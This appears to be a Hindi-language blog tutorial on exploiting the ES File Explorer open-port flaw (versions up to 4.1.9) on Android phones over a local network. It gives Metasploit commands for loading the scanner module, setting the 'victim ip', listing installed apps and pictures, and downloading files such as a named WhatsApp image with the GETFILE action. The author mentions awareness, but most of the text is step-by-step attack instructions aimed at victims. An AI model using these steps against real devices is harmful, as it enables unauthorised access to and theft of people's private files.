HACK ANDROID USE IP ADDRESS
नमस्कार दोस्तों,
बहुत से मित्रों ने मुझे कहा कि आपने जो Exploit की पोस्टें की है वो आउट डेटेड है? मैं आपको बताना चाहुंगा कि ज्यादातर लोग पायरेटेड विण्डोज और सोफ्टवेयर का उपयोग करते है। जिससे वो अपडेट नहीं होते है।
इस वजह से उन्हें Exploit के द्वारा हैक किया जा सकता है। दूसरा कारण है कि आप लोग इन चीजों को समझे व इनका शिकार होने से बचे।
इसके विपरित फोन में एन्ड्रोयड ओएस ओपन सोर्स फ्री प्रोजेक्ट है इस वजह से इसकी सारी एप ओटो अपडेट हो जाती है। जो एप एक्सट्रनल इंस्टाल की जाती है वो ओटो अपडेट नहीं होती है।
आप सभी ने ES File Explorer का नाम तो सुना ही होगा। यह एक फाईल एक्सप्लोलर है जो एन्ड्रोयड के लिए बनाया गया है। यह फ्री और पैड दोनों वर्जन में उपलब्ध है। यह प्ले स्टोर पर उपलब्ध नहीं है।
इसका लेटेस्ट वर्जन आप इसकी ओफिशियल साईट से डाउनलोड कर सकते है। यह एक चाईनीज एप है।
ES File Explorer पर एक पोस्ट में पहले भी बना चुका हूं। इसका उपयोग कर हम बिना केबल के फाईल शेयर कर सकते है।
2019 में इसमें एक बहुत खतरनाक Exploit मिला। जिसका उपयोग कर विक्टिम के फोन को एक्सेस किया जा सकता था।
जिसे लोकल नेटर्वक पर ही एक्सेस किया जाता है। जब हम फाईल शेयर के लिये इसे ओपन करते है तब यह एक पोर्ट को लिस्नर पर लगा देता है।
यह Exploit ES File Explorer के वर्जन 4.1.9 तक ही कार्य करता है।
इसे विण्डोज और लाइनेक्स दोनों पर भी Exploit कर सकते है।
कन्ट्रोल विक्टिम फोन मेमोरी डाटा
Pre-requisite
Latest Version Metasploit
How to use?
सबसे पहले मेटास्प्लोइट को ओपर कर, उसमें सर्च करें
Search es_file_explorer
अब use कामाण्ड का प्रयोग करते हुए इसका उपयोग करें।
use auxiliary/scanner/http/es_file_ explorer_open_oprt
info कमाण्ड का उपयोग करके आप इसके बारें में और जानकारी ले सकते है।
RHOST के स्थान पर हमें सिर्फ विक्टिम की आईपी का उपयोग करना है।
set rhost <victim ip>
show options कमाण्ड का उपयोग करके आप चैक कर सकते है कि जानकारी सही है या नहीं?
run or exploit किसी भी कमाण्ड का उपयोग करे, विक्टिम Exploit हो जायेगा।
show actions कमाण्ड का उपयेाग करके आप इसकी सारे कमाण्ड को देख सकते है।
set actions का उपयोग करके, किसी भी कमाण्ड को उपयोग ले सकते है।
set actions LISTAPPS
APPLAUNCH & GETFILE के लिए ACTIONITEM में उनका पाथ एड करना पड़ेगा।
HOW TO DOWNLOADS FILES?
फाईल डाउनलोड करने से पहले हमें फाईल के पाथ की जरूरत पड़ेगे। जैसे की हमें कोई इमेज फाईल डानउलोड करनी है तो पहले LISTPICS कमाण्ड का उपयोग करके फाईल के पाथ को काॅपी कर ले। इस कमाण्ड से फोन की सारी इमेज फाईल आपको दिख जायेगी।
ACTIONITEM set कमाण्ड का उपयोग करे।
set ACTIONITEM + File Path
set ACTIONITEM /sdcard/ VMOSfiletrans ferstation/ IMG- 20200622- WA0012.jpg
अब Action set करें।
set action GETFILE
run कमाण्डा का उपयोग करके RUN करें।
नोट: इससे मल्टीपल फाईल को एक साथ डाउनलोड नहीं कर सकते ।
आशा करता हूं मेरा यह प्रयास आपको पसंद आयेगा।
धन्यवाद!